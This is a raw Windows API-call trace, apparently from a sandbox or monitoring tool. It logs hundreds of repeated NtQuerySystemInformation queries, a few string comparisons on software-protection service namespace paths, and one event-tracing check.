[0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0217.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0217.750] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0217.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x40, ResultLength=0x0) [0217.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0217.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0217.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0217.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0217.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd948, Length=0x30, ResultLength=0x0) [0217.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0217.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0217.945] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x20, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0217.963] EtwEventEnabled (RegHandle=0x18027fc8dc6f30, EventDescriptor=0xf7a67fd9b0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd948, Length=0x30, ResultLength=0x0) [0217.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0217.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0217.965] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 